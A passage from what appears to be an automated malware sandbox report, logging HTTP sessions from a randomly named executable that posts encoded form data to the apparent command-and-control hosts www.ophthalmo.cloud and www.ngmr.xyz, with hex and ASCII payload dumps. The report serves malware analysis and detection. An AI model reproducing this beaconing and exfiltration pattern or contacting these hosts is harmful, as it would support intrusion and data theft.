                                                                    6192.168.2.849719217.160.0.207805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:16.412672997 CET804OUTPOST /mgg3/ HTTP/1.1
                                                                    Host: www.ophthalmo.cloud
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.ophthalmo.cloud
                                                                    Connection: close
                                                                    Content-Length: 225
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.ophthalmo.cloud/mgg3/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 72 74 2f 46 45 43 6a 66 2b 70 67 4e 4f 33 49 52 32 55 68 58 35 30 69 4a 55 6a 76 6b 75 64 51 6f 7a 58 69 4c 6e 61 35 41 42 74 78 52 52 2f 6f 56 4b 38 48 70 74 4c 44 44 4d 4d 78 73 58 74 7a 52 71 77 73 7a 4c 75 78 6b 7a 6d 35 6a 77 66 4b 44 58 6d 6b 71 2f 36 66 4a 32 37 6a 57 2f 50 44 58 30 56 73 46 59 54 4a 47 58 67 41 50 6c 33 6a 31 70 61 39 35 79 55 55 31 41 51 73 43 53 6e 69 35 79 53 50 44 53 36 38 6a 34 39 72 67 78 33 75 2b 61 41 42 70 46 73 30 6f 78 70 74 38 4e 4a 32 48 32 6f 69 47 69 4c 6f 43 44 6c 43 58 43 39 45 4e 31 6d 7a 73 57 45 4e 59 34 31 6b 72 7a 6e 69 70 57 66 71 37 30 49 76 39 75 50 6a 4a 35 35 6c 68
                                                                    Data Ascii: 1ZqD=tGqcJQu3iOnort/FECjf+pgNO3IR2UhX50iJUjvkudQozXiLna5ABtxRR/oVK8HptLDDMMxsXtzRqwszLuxkzm5jwfKDXmkq/6fJ27jW/PDX0VsFYTJGXgAPl3j1pa95yUU1AQsCSni5ySPDS68j49rgx3u+aABpFs0oxpt8NJ2H2oiGiLoCDlCXC9EN1mzsWENY41krznipWfq70Iv9uPjJ55lh
                                                                    Jan 11, 2025 06:32:17.062359095 CET779INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Date: Sat, 11 Jan 2025 05:32:16 GMT
                                                                    Server: Apache
                                                                    X-Frame-Options: deny
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                                    Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.849720217.160.0.207805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:18.963241100 CET1821OUTPOST /mgg3/ HTTP/1.1
                                                                    Host: www.ophthalmo.cloud
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.ophthalmo.cloud
                                                                    Connection: close
                                                                    Content-Length: 1241
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.ophthalmo.cloud/mgg3/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 74 47 71 63 4a 51 75 33 69 4f 6e 6f 72 74 2f 46 45 43 6a 66 2b 70 67 4e 4f 33 49 52 32 55 68 58 35 30 69 4a 55 6a 76 6b 75 64 49 6f 77 68 65 4c 31 35 42 41 41 74 78 52 59 66 6f 57 4b 38 47 37 74 4c 62 66 4d 4e 4d 4f 58 75 48 52 6c 32 34 7a 4f 63 4a 6b 38 6d 35 6a 79 66 4b 43 50 47 6c 69 2f 36 50 4e 32 37 7a 57 2f 50 44 58 30 55 63 46 52 68 68 47 61 41 41 41 69 33 6a 79 69 36 39 52 79 51 34 44 41 51 70 31 56 58 43 35 38 57 6a 44 55 59 6b 6a 6c 4e 72 69 79 33 75 6d 61 41 4d 33 46 73 6f 4f 78 70 78 57 4e 4f 36 48 37 5a 48 61 77 50 77 2b 59 56 57 48 4d 71 55 54 2b 68 47 4d 66 79 64 57 6c 55 59 7a 2f 43 75 66 57 2b 50 7a 78 5a 36 51 34 5a 7a 6a 6f 65 4d 4d 6f 39 30 69 32 62 2f 42 35 6b 74 74 56 67 57 68 4b 38 46 71 36 35 66 74 6c 34 57 71 73 52 72 31 4f 33 35 4d 58 67 75 62 78 39 55 57 4c 57 75 67 34 6a 7a 48 62 2b 66 54 5a 47 4d 76 74 45 4a 59 4f 51 4c 77 75 62 69 50 6f 35 72 63 53 31 50 79 65 56 48 7a 44 75 4d 6c 55 4c 7a 66 4b 79 65 43 6b 2f 47 75 6e 75 49 76 7a 34 48 4a 46 57 62 4b 56 [TRUNCATED]
                                                                    Data Ascii: 1ZqD=tGqcJQu3iOnort/FECjf+pgNO3IR2UhX50iJUjvkudIowheL15BAAtxRYfoWK8G7tLbfMNMOXuHRl24zOcJk8m5jyfKCPGli/6PN27zW/PDX0UcFRhhGaAAAi3jyi69RyQ4DAQp1VXC58WjDUYkjlNriy3umaAM3FsoOxpxWNO6H7ZHawPw+YVWHMqUT+hGMfydWlUYz/CufW+PzxZ6Q4ZzjoeMMo90i2b/B5kttVgWhK8Fq65ftl4WqsRr1O35MXgubx9UWLWug4jzHb+fTZGMvtEJYOQLwubiPo5rcS1PyeVHzDuMlULzfKyeCk/GunuIvz4HJFWbKVAjGsqirv9iQZkkUUBS19WnU1mBgQ8KCJf8GB20ER9CuK6Hj58l4GgL7y2Yp0myOHphMQdrMTbSGiGPMt0sJLwsox4qOHUitPhj26Ww6RxdqI3P5iYElxsAswBWq1bJxd29abqyPVoxiOoVXhlCCLrz/F+gLjWi9i4Z0tg0V6Qnc256ZWmSJK8AELwW8X4ATyZCorB/WnYExvGShQJ61jp6edWPOd0/pLI2qcXcQBFWJWyF4wxbxqY0Pr2IToZ+7YCEUJ4uBx6pcNIRqMKffA3YKHa4M8Sm2IDKceYSLpA8kF+qPuzePQmtj76FHOlVLcyIk2ULNGdoSg4+awIRwTscguc/5xzelkOlRhidMs+hJF7xR5UgxJ7zAenRhbaeNunZXdgk65rVCW1uT5Qb+teZ721GO5idqrKtZ3RU5vHUoqKQxx3NZAQzItxctbianvucJzg2wRKr/xElfFPmxBAkesGo2cClZNnQRqXFozH1GnGMtZSkg/6BheAcryJRu63XA4CV1F/x5hLCkiZ0DK6bv/48SH/iR90x6AhizPu4OOm4xxn9pUs9yG8OBIZa99WfGkILGX+s8oWSn41kUqY8scXsaZL+K0HDa4UEDSFPyHBP4T5gfoQqptGQgRQX1dOyZEKded70Z9Ah47VGTW3PURP5QFwGNLnW [TRUNCATED]
                                                                    Jan 11, 2025 06:32:19.589622021 CET779INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Date: Sat, 11 Jan 2025 05:32:19 GMT
                                                                    Server: Apache
                                                                    X-Frame-Options: deny
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                                    Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.849721217.160.0.207805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:21.500574112 CET517OUTGET /mgg3/?1ZqD=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&dbFX6=JLnL0 HTTP/1.1
                                                                    Host: www.ophthalmo.cloud
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Jan 11, 2025 06:32:22.136074066 CET1236INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Content-Length: 1271
                                                                    Connection: close
                                                                    Date: Sat, 11 Jan 2025 05:32:22 GMT
                                                                    Server: Apache
                                                                    X-Frame-Options: deny
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                                    Jan 11, 2025 06:32:22.136101961 CET203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a
                                                                    Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.84972254.67.87.110805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:27.489717960 CET763OUTPOST /qj8y/ HTTP/1.1
                                                                    Host: www.ngmr.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.ngmr.xyz
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.ngmr.xyz/qj8y/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 59 4a 45 52 33 58 44 44 64 71 51 35 43 51 2b 2b 68 4b 41 32 6b 6a 58 68 51 61 76 64 6a 49 6d 50 53 4f 2f 32 6f 4e 58 33 42 42 53 4b 77 74 72 6e 75 78 76 44 51 78 2b 37 4c 57 4a 6d 42 7a 34 30 57 2b 7a 6a 42 58 65 58 37 2b 37 61 31 76 64 52 6b 57 68 45 67 56 31 67 39 56 31 6c 4f 59 55 34 31 4c 34 6b 58 33 69 72 65 73 6e 73 2f 34 61 39 37 6a 42 5a 34 58 6e 4d 50 7a 65 70 79 70 6c 79 36 71 34 4f 33 43 6d 41 64 37 50 4e 6f 75 4b 45 46 4a 43 61 30 67 63 6a 65 32 56 4f 4f 61 69 56 6b 57 48 6e 33 4f 2f 38 72 52 62 57 54 47 63 2f 52 66 51 76 2f 5a 78 37 5a 71 79 47 47 50 58 74 32 55 6e 75 52 59 51 3d
                                                                    Data Ascii: 1ZqD=YJER3XDDdqQ5CQ++hKA2kjXhQavdjImPSO/2oNX3BBSKwtrnuxvDQx+7LWJmBz40W+zjBXeX7+7a1vdRkWhEgV1g9V1lOYU41L4kX3iresns/4a97jBZ4XnMPzepyply6q4O3CmAd7PNouKEFJCa0gcje2VOOaiVkWHn3O/8rRbWTGc/RfQv/Zx7ZqyGGPXt2UnuRYQ=
                                                                    Jan 11, 2025 06:32:28.076931000 CET550INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 282
                                                                    Accept-Ranges: bytes
                                                                    Date: Sat, 11 Jan 2025 05:55:42 GMT
                                                                    X-Varnish: 1719142264
                                                                    Age: 0
                                                                    Via: 1.1 varnish
                                                                    Connection: close
                                                                    X-Varnish-Cache: MISS
                                                                    Server: C2M Server v1.02
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.84972354.67.87.110805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:30.035326004 CET783OUTPOST /qj8y/ HTTP/1.1
                                                                    Host: www.ngmr.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.ngmr.xyz
                                                                    Connection: close
                                                                    Content-Length: 225
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.ngmr.xyz/qj8y/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 59 4a 45 52 33 58 44 44 64 71 51 35 41 77 4f 2b 75 4e 63 32 6f 54 58 6d 4a 71 76 64 78 49 6d 4c 53 4f 7a 32 6f 50 37 42 42 79 32 4b 78 4a 6a 6e 76 31 37 44 64 52 2b 37 41 32 4a 6a 63 44 34 2f 57 2b 32 57 42 53 2b 58 37 2b 48 61 31 74 56 52 6e 6c 35 4c 67 46 31 75 78 31 31 6e 54 6f 55 34 31 4c 34 6b 58 7a 4f 52 65 6f 7a 73 2f 4c 53 39 37 43 42 65 77 33 6e 4e 49 7a 65 70 32 70 6c 2b 36 71 34 38 33 47 47 6d 64 35 33 4e 6f 75 61 45 4c 36 61 5a 36 67 63 6c 44 6d 56 52 4a 37 62 4e 74 6e 53 43 70 39 6d 5a 6d 52 54 7a 53 77 78 56 4c 39 59 70 38 5a 5a 51 5a 70 61 77 44 34 4b 46 73 33 33 65 50 50 45 7a 7a 6b 78 31 57 67 42 5a 75 43 66 70 64 6d 76 57 53 33 53 4c
                                                                    Data Ascii: 1ZqD=YJER3XDDdqQ5AwO+uNc2oTXmJqvdxImLSOz2oP7BBy2KxJjnv17DdR+7A2JjcD4/W+2WBS+X7+Ha1tVRnl5LgF1ux11nToU41L4kXzOReozs/LS97CBew3nNIzep2pl+6q483GGmd53NouaEL6aZ6gclDmVRJ7bNtnSCp9mZmRTzSwxVL9Yp8ZZQZpawD4KFs33ePPEzzkx1WgBZuCfpdmvWS3SL
                                                                    Jan 11, 2025 06:32:30.615391970 CET550INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 282
                                                                    Accept-Ranges: bytes
                                                                    Date: Sat, 11 Jan 2025 05:55:45 GMT
                                                                    X-Varnish: 1719142286
                                                                    Age: 0
                                                                    Via: 1.1 varnish
                                                                    Connection: close
                                                                    X-Varnish-Cache: MISS
                                                                    Server: C2M Server v1.02
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.84972454.67.87.110805220C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 11, 2025 06:32:32.584050894 CET1800OUTPOST /qj8y/ HTTP/1.1
                                                                    Host: www.ngmr.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.ngmr.xyz
                                                                    Connection: close
                                                                    Content-Length: 1241
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.ngmr.xyz/qj8y/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 59 4a 45 52 33 58 44 44 64 71 51 35 41 77 4f 2b 75 4e 63 32 6f 54 58 6d 4a 71 76 64 78 49 6d 4c 53 4f 7a 32 6f 50 37 42 42 79 2b 4b 77 37 37 6e 74 55 37 44 63 52 2b 37 4a 57 4a 69 63 44 34 2b 57 34 66 65 42 53 36 74 37 37 4c 61 30 4f 4e 52 69 55 35 4c 76 46 31 75 75 46 31 6d 4f 59 55 74 31 4c 49 6f 58 7a 2b 52 65 6f 7a 73 2f 4b 43 39 35 54 42 65 32 33 6e 4d 50 7a 65 74 79 70 6c 53 36 71 67 57 33 47 43 70 64 4e 44 4e 6f 50 71 45 47 6f 43 5a 79 67 63 6e 41 6d 55 45 4a 36 6e 73 74 6e 2f 39 70 2b 37 79 6d 53 7a 7a 65 57 77 4b 5a 39 59 6a 2b 62 64 2f 57 75 65 6c 64 4a 2f 70 68 57 4b 72 46 39 73 37 78 42 35 43 63 53 4a 34 76 7a 57 6b 4c 52 6e 6b 57 43 62 4c 67 48 34 38 59 68 6f 46 2b 53 41 38 37 79 30 31 35 50 31 56 56 50 4c 4f 61 71 73 48 51 73 47 53 6d 46 32 31 52 37 6e 74 67 46 41 79 65 46 6f 4c 49 73 70 4a 30 57 39 57 49 59 6f 70 47 4c 4c 69 55 61 71 73 31 38 6f 4b 34 66 42 52 74 78 57 4b 52 45 6a 42 39 35 48 50 72 53 38 54 55 67 48 68 51 54 44 41 76 52 59 53 37 6b 68 30 6b 31 34 41 61 [TRUNCATED]
